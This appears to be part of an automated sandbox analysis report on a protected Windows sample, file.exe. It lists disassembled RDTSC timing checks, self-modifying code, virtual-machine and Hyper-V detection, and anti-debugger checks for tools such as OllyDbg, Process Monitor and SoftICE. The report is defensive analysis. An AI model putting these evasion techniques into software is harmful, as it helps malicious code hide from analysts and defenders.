                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49F125F second address: 49F12B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, ch 0x00000005 call 00007F7E2CD3B845h 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esi+0Ch] 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F7E2CD3B83Dh 0x00000018 sbb ecx, 26F49086h 0x0000001e jmp 00007F7E2CD3B841h 0x00000023 popfd 0x00000024 mov si, 5637h 0x00000028 popad 0x00000029 mov dword ptr [edx+0Ch], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f mov ebx, 5F98661Ah 0x00000034 popad 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49F12B8 second address: 49F1356 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, A7h 0x00000005 mov bl, cl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esi+10h] 0x0000000d pushad 0x0000000e mov di, 8822h 0x00000012 mov edi, 7261046Eh 0x00000017 popad 0x00000018 mov dword ptr [edx+10h], eax 0x0000001b pushad 0x0000001c mov di, 3346h 0x00000020 pushad 0x00000021 mov dx, C5A0h 0x00000025 pushfd 0x00000026 jmp 00007F7E2CC83CA9h 0x0000002b or si, CCA6h 0x00000030 jmp 00007F7E2CC83CA1h 0x00000035 popfd 0x00000036 popad 0x00000037 popad 0x00000038 mov eax, dword ptr [esi+14h] 0x0000003b jmp 00007F7E2CC83C9Eh 0x00000040 mov dword ptr [edx+14h], eax 0x00000043 jmp 00007F7E2CC83CA0h 0x00000048 mov eax, dword ptr [esi+18h] 0x0000004b pushad 0x0000004c call 00007F7E2CC83C9Eh 0x00000051 mov bx, cx 0x00000054 pop esi 0x00000055 mov ch, dl 0x00000057 popad 0x00000058 mov dword ptr [edx+18h], eax 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49F1356 second address: 49F135A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49F135A second address: 49F1360 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49F1360 second address: 49F137F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B83Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+1Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7E2CD3B83Ah 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49F137F second address: 49F138E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83C9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49F138E second address: 49F1394 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49F1394 second address: 49F1398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49F1398 second address: 49F13CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B83Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+1Ch], eax 0x0000000e jmp 00007F7E2CD3B846h 0x00000013 mov eax, dword ptr [esi+20h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49F13CB second address: 49F13D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49F13D1 second address: 49F13E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CD3B83Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49F13E0 second address: 49F141E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+20h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7E2CC83CA8h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49F141E second address: 49F1422 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49F1422 second address: 49F1428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49F1428 second address: 49F1439 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CD3B83Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49F1439 second address: 49F149C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+24h] 0x0000000e pushad 0x0000000f mov bh, cl 0x00000011 mov ebx, 7ED3DF5Ch 0x00000016 popad 0x00000017 mov dword ptr [edx+24h], eax 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F7E2CC83CA1h 0x00000021 or eax, 2EA457B6h 0x00000027 jmp 00007F7E2CC83CA1h 0x0000002c popfd 0x0000002d call 00007F7E2CC83CA0h 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49F149C second address: 49F14F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov eax, dword ptr [esi+28h] 0x00000009 pushad 0x0000000a mov al, dl 0x0000000c mov ecx, 406D6C25h 0x00000011 popad 0x00000012 mov dword ptr [edx+28h], eax 0x00000015 jmp 00007F7E2CD3B840h 0x0000001a mov ecx, dword ptr [esi+2Ch] 0x0000001d jmp 00007F7E2CD3B840h 0x00000022 mov dword ptr [edx+2Ch], ecx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F7E2CD3B847h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49F14F0 second address: 49F1508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CC83CA4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49F1508 second address: 49F1589 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [esi+30h] 0x0000000c jmp 00007F7E2CD3B847h 0x00000011 mov word ptr [edx+30h], ax 0x00000015 jmp 00007F7E2CD3B846h 0x0000001a mov ax, word ptr [esi+32h] 0x0000001e jmp 00007F7E2CD3B840h 0x00000023 mov word ptr [edx+32h], ax 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F7E2CD3B83Dh 0x00000030 xor esi, 048EE2A6h 0x00000036 jmp 00007F7E2CD3B841h 0x0000003b popfd 0x0000003c mov edi, esi 0x0000003e popad 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49F1589 second address: 49F15A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CC83CA8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49F15A5 second address: 49F15F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+34h] 0x0000000b pushad 0x0000000c jmp 00007F7E2CD3B83Dh 0x00000011 mov ax, B0A7h 0x00000015 popad 0x00000016 mov dword ptr [edx+34h], eax 0x00000019 jmp 00007F7E2CD3B83Ah 0x0000001e test ecx, 00000700h 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 call 00007F7E2CD3B848h 0x0000002c pop esi 0x0000002d popad 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49F15F3 second address: 49F163E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7E2CC83C9Eh 0x00000009 and si, BF68h 0x0000000e jmp 00007F7E2CC83C9Bh 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 jne 00007F7E9DBC1D92h 0x0000001f jmp 00007F7E2CC83CA4h 0x00000024 or dword ptr [edx+38h], FFFFFFFFh 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b push edx 0x0000002c pop esi 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49F163E second address: 49F168F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7E2CD3B83Fh 0x00000008 sub si, 680Eh 0x0000000d jmp 00007F7E2CD3B849h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 or dword ptr [edx+3Ch], FFFFFFFFh 0x0000001a jmp 00007F7E2CD3B83Eh 0x0000001f or dword ptr [edx+40h], FFFFFFFFh 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov si, bx 0x00000029 popad 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49F168F second address: 49F1695 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49F1695 second address: 49F1699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49F1699 second address: 49F16EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F7E2CC83CA9h 0x00000010 sbb ax, 8C56h 0x00000015 jmp 00007F7E2CC83CA1h 0x0000001a popfd 0x0000001b mov ebx, ecx 0x0000001d popad 0x0000001e pop ebx 0x0000001f pushad 0x00000020 mov esi, 33AE52BFh 0x00000025 mov edi, esi 0x00000027 popad 0x00000028 leave 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c movsx ebx, ax 0x0000002f mov eax, 584AF1CBh 0x00000034 popad 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49E0965 second address: 49E0969 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49E0969 second address: 49E096F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49E096F second address: 49E0975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49E0975 second address: 49E0979 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49C0CDB second address: 49C0CE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49C0CE1 second address: 49C0CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49C0CE5 second address: 49C0D29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop ecx 0x0000000e pushfd 0x0000000f jmp 00007F7E2CD3B847h 0x00000014 add al, FFFFFFAEh 0x00000017 jmp 00007F7E2CD3B849h 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49C0D29 second address: 49C0D8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7E2CC83CA7h 0x00000008 call 00007F7E2CC83CA8h 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F7E2CC83C9Dh 0x0000001b sub esi, 7AF803F6h 0x00000021 jmp 00007F7E2CC83CA1h 0x00000026 popfd 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49E088D second address: 49E0891 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49E0891 second address: 49E0897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A0064F second address: 4A00655 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A00655 second address: 4A00670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CC83CA7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A00670 second address: 4A0069D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B849h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov bx, 143Eh 0x00000015 mov cx, dx 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A0069D second address: 4A006CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F7E2CC83CA0h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov bl, 67h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A0092A second address: 4A0097B instructions: 0x00000000 rdtsc 0x00000002 mov esi, 6F537B49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a call 00007F7E2CD3B845h 0x0000000f pop esi 0x00000010 pop ebx 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 pushad 0x00000014 mov eax, 4CFC5229h 0x00000019 mov bx, si 0x0000001c popad 0x0000001d push eax 0x0000001e jmp 00007F7E2CD3B83Bh 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F7E2CD3B845h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A0097B second address: 4A00981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A00981 second address: 4A00985 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A00985 second address: 4A009B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F7E2CC83C9Fh 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7E2CC83CA5h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A009B6 second address: 4A009C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CD3B83Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49D0A4E second address: 49D0A61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83C9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49D0957 second address: 49D095B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49D095B second address: 49D0961 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49D0961 second address: 49D0967 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49D0967 second address: 49D096B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A1001E second address: 4A10026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, bx 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10026 second address: 4A1002C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A1002C second address: 4A10030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10030 second address: 4A10034 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10034 second address: 4A100D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b mov ecx, ebx 0x0000000d mov bl, 50h 0x0000000f popad 0x00000010 pushfd 0x00000011 jmp 00007F7E2CD3B83Eh 0x00000016 sbb cl, FFFFFFB8h 0x00000019 jmp 00007F7E2CD3B83Bh 0x0000001e popfd 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F7E2CD3B83Bh 0x00000028 adc ecx, 7DD6657Eh 0x0000002e jmp 00007F7E2CD3B849h 0x00000033 popfd 0x00000034 popad 0x00000035 mov ebp, esp 0x00000037 pushad 0x00000038 mov cx, 9563h 0x0000003c pushad 0x0000003d mov cx, 0ED5h 0x00000041 call 00007F7E2CD3B842h 0x00000046 pop esi 0x00000047 popad 0x00000048 popad 0x00000049 and esp, FFFFFFF8h 0x0000004c jmp 00007F7E2CD3B841h 0x00000051 xchg eax, ecx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F7E2CD3B83Dh 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A100D7 second address: 4A10159 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7E2CC83CA1h 0x0000000f xchg eax, ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F7E2CC83CA3h 0x00000019 xor si, FFAEh 0x0000001e jmp 00007F7E2CC83CA9h 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007F7E2CC83CA0h 0x0000002a sbb esi, 1BC07128h 0x00000030 jmp 00007F7E2CC83C9Bh 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10159 second address: 4A1016F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 mov dh, BEh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx ebx, ax 0x00000012 movzx eax, di 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 473CC4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 61359F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 61394F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 622734 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 698728 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00474058 rdtsc 0_2_00474058
                Source: C:\Users\user\Desktop\file.exe | Window / User API: threadDelayed 1430
                Source: C:\Users\user\Desktop\file.exe | Window / User API: threadDelayed 1304
                Source: C:\Users\user\Desktop\file.exe | API coverage: 4.4 %
                Source: C:\Users\user\Desktop\file.exe TID: 2164 | Thread sleep count: 68 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 2164 | Thread sleep time: -136068s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 2556 | Thread sleep count: 1430 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 2556 | Thread sleep time: -2861430s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1240 | Thread sleep count: 92 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 1240 | Thread sleep count: 51 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 1892 | Thread sleep time: -32000s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 2104 | Thread sleep count: 1304 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 2104 | Thread sleep time: -2609304s >= -30000s
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00417727 FindFirstFileExW,0_2_00417727
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0494798E FindFirstFileExW,0_2_0494798E
                Source: file.exe, file.exe, 00000000.00000002.4514188391.00000000005F2000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.4516328047.0000000005260000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4514605892.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4514605892.0000000000A18000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.4514188391.00000000005F2000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Process Stats: CPU usage > 42% for more than 60s
                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00474058 rdtsc 0_2_00474058
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040CDE3
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402A50
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04787D41 push dword ptr fs:[00000030h] 0_2_04787D41
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04930D90 mov eax, dword ptr fs:[00000030h] 0_2_04930D90
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0493092B mov eax, dword ptr fs:[00000030h] 0_2_0493092B
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00418592 GetProcessHeap,0_2_00418592
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00409A2A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00409A2A
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040CDE3
